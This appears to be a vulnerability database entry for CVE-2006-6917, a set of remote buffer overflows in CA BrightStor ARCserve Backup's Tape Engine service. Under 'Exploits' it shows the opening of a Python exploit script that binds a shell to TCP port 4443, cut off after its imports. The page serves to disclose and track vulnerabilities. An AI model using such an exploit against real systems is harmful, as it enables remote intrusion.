CVE-2006-6917

Published: 31/12/2006 Updated: 07/04/2021
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Multiple buffer overflows in Computer Associates (CA) BrightStor ARCserve Backup R11.5 Server before SP2 allow remote malicious users to execute arbitrary code in the Tape Engine (tapeeng.exe) via a crafted RPC request with (1) opnum 38, which is not properly handled in TAPEUTIL.dll 11.5.3884.0, or (2) opnum 37, which is not properly handled in TAPEENG.dll 11.5.3884.0.

Vulnerable Product

broadcom brightstor arcserve backup server 11.5

Exploits

#!/usr/bin/python
# Remote exploit for buffer overflow vulnerability in CA BrightStor Arcserve
# tapeeng.exe service. Tested on windows 2000 SP4. Binds shell to TCP port 4443
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
from impacket.dcerpc import transport, dcerpc
from impacket import u ...